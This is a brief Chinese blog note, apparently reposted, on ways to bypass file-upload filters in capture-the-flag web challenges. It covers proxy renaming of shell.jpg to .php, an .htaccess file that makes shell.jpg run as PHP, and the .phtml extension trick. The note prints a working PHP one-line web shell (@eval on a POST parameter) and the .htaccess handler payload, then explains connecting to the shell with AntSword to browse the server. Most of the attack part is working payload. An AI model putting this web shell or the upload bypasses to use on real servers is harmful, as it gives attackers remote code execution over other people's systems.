web文件上传思路(一句话muma)
生活随笔
收集整理的這篇文章主要介紹了
web文件上传思路(一句话muma)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
一.上傳shell.jpg(基本沒用)
二.上傳shell.jpg,抓包之后改shell.php(沒有第二次)
三.先上傳.htaccess文件繞過,再上傳shell.jpg
四.剛學習了一種繞過方法,就是吧shell.jpg的擴展名直接改為.phtml
以上方式成功上傳一句話木馬之后,鏈接蟻劍,查看目錄找flag即可,
還有例外的上傳文件題,flag在配置文件中,需在配置文件中找flag。
附:
.htaccess文件:
<FilesMatch "shell.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
(shell.jpg是一句話木馬文件)
一句話木馬文件shell.php:
<?php @eval($_POST['pass']);?>
(在用yijian鏈接時密碼就是post括號引號里的)
總結
以上是生活随笔為你收集整理的web文件上传思路(一句话muma)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: win10安装atom的步骤
- 下一篇: Ubuntu连接不上网络问题的解决方法